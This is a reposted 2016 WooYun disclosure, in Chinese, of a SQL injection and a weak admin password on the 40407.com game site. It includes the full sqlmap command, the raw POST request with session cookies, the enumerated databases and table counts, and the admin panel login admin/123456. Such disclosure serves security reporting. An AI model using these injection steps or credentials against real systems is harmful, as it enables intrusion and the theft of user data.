游戏安全之40407游戏网某处SQL注入(涉及50w用户信息)+某系统弱口令

admin
admin
admin
109533
文章
90
评论
2017年5月1日21:19:02评论373 views字数 240阅读0分48秒阅读模式
摘要

2016-04-28: 细节已通知厂商并且等待厂商处理中
2016-04-28: 厂商已经确认,细节仅向厂商公开
2016-05-08: 细节向核心白帽子及相关领域专家公开
2016-05-18: 细节向普通白帽子公开
2016-05-28: 细节向实习白帽子公开
2016-06-12: 细节向公众公开

漏洞概要 关注数(4) 关注此漏洞

缺陷编号: WooYun-2016-202879

漏洞标题: 游戏安全之40407游戏网某处SQL注入(涉及50w用户信息)+某系统弱口令

相关厂商: 40407.com

漏洞作者: 黑色键盘丶

提交时间: 2016-04-28 09:09

公开时间: 2016-06-12 11:00

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: php+数字类型注射 注射技巧

0人收藏

漏洞详情

披露状态:

2016-04-28: 细节已通知厂商并且等待厂商处理中
2016-04-28: 厂商已经确认,细节仅向厂商公开
2016-05-08: 细节向核心白帽子及相关领域专家公开
2016-05-18: 细节向普通白帽子公开
2016-05-28: 细节向实习白帽子公开
2016-06-12: 细节向公众公开

简要描述:

RT

详细说明:

code 区域 
post注入语法:sqlmap.py -r 1.txt --dbs 注入参数sid
 ====================post数据包=======================
 POST /index.php?c=pay&a=testgamerole HTTP/1.1
 Host: wan.40407.com
 Proxy-Connection: keep-alive
 Content-Length: 36
 Accept: */*
 Origin: http://wan.40407.com
 X-Requested-With: XMLHttpRequest
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
 Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 Referer: http://wan.40407.com/index.php?c=pay&pt=pt
 Accept-Encoding: gzip,deflate
 Accept-Language: zh-CN,zh;q=0.8
 Cookie: PHPSESSID=2f0313d49c83605b7c6c8d80cb40c971; _yd_=GA1.2.478994187.1461769909; Hm_lvt_e2dde3f9ab03af73ad54a2cc879b4fc8=1461769909,1461770157,1461770180,1461774259; Hm_lpvt_e2dde3f9ab03af73ad54a2cc879b4fc8=1461774398; DedeUserID=1988819; DedeUserID__ckMd5=e296d0b0648a8b88; DedeLoginTime=1461774649; DedeLoginTime__ckMd5=27c8d38a4bf65d3d; wanuserid=czo4OiJoZWlzZTEyMyI7; wanmember_mid=czo1OiI5NzMyNCI7; wansafe_pw=czozMjoiNDI5N2Y0NGIxMzk1NTIzNTI0NWIyNDk3Mzk5ZDdhOTMiOw%3D%3D; wansafe_yz=aToxOw%3D%3D
 
 username=heise123&gid=5&sid=32&isyk=

数据库信息

code 区域 
available databases [25]:
 [*] `14x`
 [*] `399wantg`
 [*] `40407box_test`
 [*] `40407box`
 [*] `40407boxpt_test`
 [*] `40407boxpt`
 [*] `40407boxstat`
 [*] `40407data`
 [*] `40407kfz`
 [*] `40407lol`
 [*] `40407tqyt`
 [*] `dkwdv{`
 [*] `kp.ya58.cn`
 [*] `s}/x1a!/x03!`
 [*] `ucentir)/x11`
 [*] `xiro7!`
 [*] bcgua
 [*] information_schema
 [*] mysql
 [*] percona
 [*] performance_schema
 [*] projeit
 [*] smweb
 [*] testcy
 [*] tuan

当前库表信息

code 区域 
Database: 40407boxpt
 +----------------------+---------+
 | Table                | Entries |
 +----------------------+---------+
 | box_game_tg_data     | 761184  |
 | box_game_member      | 450339  |
 | box_gamecard_sn      | 280019  |
 | box_pay              | 22280   |
 | box_score_record     | 4632    |
 | box_score_playinfo   | 4016    |
 | box_member_mac       | 3041    |
 | box_content_1        | 2220    |
 | box_content_1_extend | 1900    |
 | box_score_rule       | 1306    |
 | box_pk_username      | 1074    |
 | box_game_server      | 650     |
 | box_content_1_item   | 576     |
 | box_jf_pay           | 479     |
 | box_tag              | 236     |
 | box_admin_user       | 227     |
 | box_score_game       | 160     |
 | box_content_1_sjsg   | 139     |
 | box_score_pay        | 139     |
 | box_category         | 131     |
 | box_content_1_jjsg   | 125     |
 | box_content_1_sjtl   | 90      |
 | box_content_1_hero   | 67      |
 | box_content_1_zwx    | 67      |
 | box_content_1_nslm   | 55      |
 | box_model            | 35      |
 | box_model_field      | 35      |
 | box_game             | 34      |
 | box_content_1_rxsg2  | 32      |
 | box_content_1_jyjh   | 29      |
 | box_content_1_ocean  | 26      |
 | box_content_1_hwsg   | 25      |
 | box_content_1_mycs   | 25      |
 | box_user_tg          | 24      |
 | box_pay_cycle        | 23      |
 | box_linkage          | 18      |
 | box_ad               | 16      |
 | box_content_1_jyjx   | 16      |
 | box_pk_game          | 13      |
 | box_pk_number        | 13      |
 | box_content          | 12      |
 | box_gid_modelid      | 10      |
 | box_pingtaibi_fanli  | 10      |
 | box_pk_rule          | 10      |
 | box_content_1_bztx   | 8       |
 | box_plugin           | 6       |
 | box_content_1_smzt   | 5       |
 | box_member_group     | 5       |
 | box_admin_group      | 4       |
 | box_content_1_jz     | 4       |
 | box_content_1_rxsg   | 4       |
 | box_role             | 4       |
 | box_content_1_mjll   | 3       |
 | box_wan_top_gg       | 3       |
 | box_content_1_dsg    | 2       |
 | box_content_1_game   | 2       |
 | box_content_1_swydn  | 2       |
 | box_content_1_xbjz   | 2       |
 +----------------------+---------+
 -------------------------------------
 Database: 40407boxpt   45w用户信息
 +-----------------+---------+
 | Table           | Entries |
 +-----------------+---------+
 | box_game_member | 450339  |
 +-----------------+---------+
 20多万估计卡密信息吧 70多w什么信息的 支付信息等

由于是延迟注入这里就不跑数据信息证明了

======================================================================

code 区域 
http://tg.40407.com/admin/mainindex/index  admin 123456 进入

可以修改游戏的推广信息啦

游戏安全之40407游戏网某处SQL注入(涉及50w用户信息)+某系统弱口令

一些用户信息

游戏安全之40407游戏网某处SQL注入(涉及50w用户信息)+某系统弱口令

漏洞证明:

code 区域 
post注入语法:sqlmap.py -r 1.txt --dbs 注入参数sid
 ====================post数据包=======================
 POST /index.php?c=pay&a=testgamerole HTTP/1.1
 Host: wan.40407.com
 Proxy-Connection: keep-alive
 Content-Length: 36
 Accept: */*
 Origin: http://wan.40407.com
 X-Requested-With: XMLHttpRequest
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
 Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 Referer: http://wan.40407.com/index.php?c=pay&pt=pt
 Accept-Encoding: gzip,deflate
 Accept-Language: zh-CN,zh;q=0.8
 Cookie: PHPSESSID=2f0313d49c83605b7c6c8d80cb40c971; _yd_=GA1.2.478994187.1461769909; Hm_lvt_e2dde3f9ab03af73ad54a2cc879b4fc8=1461769909,1461770157,1461770180,1461774259; Hm_lpvt_e2dde3f9ab03af73ad54a2cc879b4fc8=1461774398; DedeUserID=1988819; DedeUserID__ckMd5=e296d0b0648a8b88; DedeLoginTime=1461774649; DedeLoginTime__ckMd5=27c8d38a4bf65d3d; wanuserid=czo4OiJoZWlzZTEyMyI7; wanmember_mid=czo1OiI5NzMyNCI7; wansafe_pw=czozMjoiNDI5N2Y0NGIxMzk1NTIzNTI0NWIyNDk3Mzk5ZDdhOTMiOw%3D%3D; wansafe_yz=aToxOw%3D%3D
 
 username=heise123&gid=5&sid=32&isyk=

数据库信息

code 区域 
available databases [25]:
 [*] `14x`
 [*] `399wantg`
 [*] `40407box_test`
 [*] `40407box`
 [*] `40407boxpt_test`
 [*] `40407boxpt`
 [*] `40407boxstat`
 [*] `40407data`
 [*] `40407kfz`
 [*] `40407lol`
 [*] `40407tqyt`
 [*] `dkwdv{`
 [*] `kp.ya58.cn`
 [*] `s}/x1a!/x03!`
 [*] `ucentir)/x11`
 [*] `xiro7!`
 [*] bcgua
 [*] information_schema
 [*] mysql
 [*] percona
 [*] performance_schema
 [*] projeit
 [*] smweb
 [*] testcy
 [*] tuan

当前库表信息

code 区域 
Database: 40407boxpt
 +----------------------+---------+
 | Table                | Entries |
 +----------------------+---------+
 | box_game_tg_data     | 761184  |
 | box_game_member      | 450339  |
 | box_gamecard_sn      | 280019  |
 | box_pay              | 22280   |
 | box_score_record     | 4632    |
 | box_score_playinfo   | 4016    |
 | box_member_mac       | 3041    |
 | box_content_1        | 2220    |
 | box_content_1_extend | 1900    |
 | box_score_rule       | 1306    |
 | box_pk_username      | 1074    |
 | box_game_server      | 650     |
 | box_content_1_item   | 576     |
 | box_jf_pay           | 479     |
 | box_tag              | 236     |
 | box_admin_user       | 227     |
 | box_score_game       | 160     |
 | box_content_1_sjsg   | 139     |
 | box_score_pay        | 139     |
 | box_category         | 131     |
 | box_content_1_jjsg   | 125     |
 | box_content_1_sjtl   | 90      |
 | box_content_1_hero   | 67      |
 | box_content_1_zwx    | 67      |
 | box_content_1_nslm   | 55      |
 | box_model            | 35      |
 | box_model_field      | 35      |
 | box_game             | 34      |
 | box_content_1_rxsg2  | 32      |
 | box_content_1_jyjh   | 29      |
 | box_content_1_ocean  | 26      |
 | box_content_1_hwsg   | 25      |
 | box_content_1_mycs   | 25      |
 | box_user_tg          | 24      |
 | box_pay_cycle        | 23      |
 | box_linkage          | 18      |
 | box_ad               | 16      |
 | box_content_1_jyjx   | 16      |
 | box_pk_game          | 13      |
 | box_pk_number        | 13      |
 | box_content          | 12      |
 | box_gid_modelid      | 10      |
 | box_pingtaibi_fanli  | 10      |
 | box_pk_rule          | 10      |
 | box_content_1_bztx   | 8       |
 | box_plugin           | 6       |
 | box_content_1_smzt   | 5       |
 | box_member_group     | 5       |
 | box_admin_group      | 4       |
 | box_content_1_jz     | 4       |
 | box_content_1_rxsg   | 4       |
 | box_role             | 4       |
 | box_content_1_mjll   | 3       |
 | box_wan_top_gg       | 3       |
 | box_content_1_dsg    | 2       |
 | box_content_1_game   | 2       |
 | box_content_1_swydn  | 2       |
 | box_content_1_xbjz   | 2       |
 +----------------------+---------+
 -------------------------------------
 Database: 40407boxpt   45w用户信息
 +-----------------+---------+
 | Table           | Entries |
 +-----------------+---------+
 | box_game_member | 450339  |
 +-----------------+---------+
 20多万估计卡密信息吧 70多w什么信息的 支付信息等

由于是延迟注入这里就不跑数据信息证明了

======================================================================

code 区域 
http://tg.40407.com/admin/mainindex/index  admin 123456 进入

可以修改游戏的推广信息啦

游戏安全之40407游戏网某处SQL注入(涉及50w用户信息)+某系统弱口令

一些用户信息

游戏安全之40407游戏网某处SQL注入(涉及50w用户信息)+某系统弱口令

修复方案:

过滤 加强密码

版权声明:转载请注明来源 黑色键盘丶@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-04-28 10:54

厂商回复:

谢谢,参数过滤的还是要加强处理,平台没上线内部测试结果没修改密码……

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

  1. 测试平台已经关闭

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin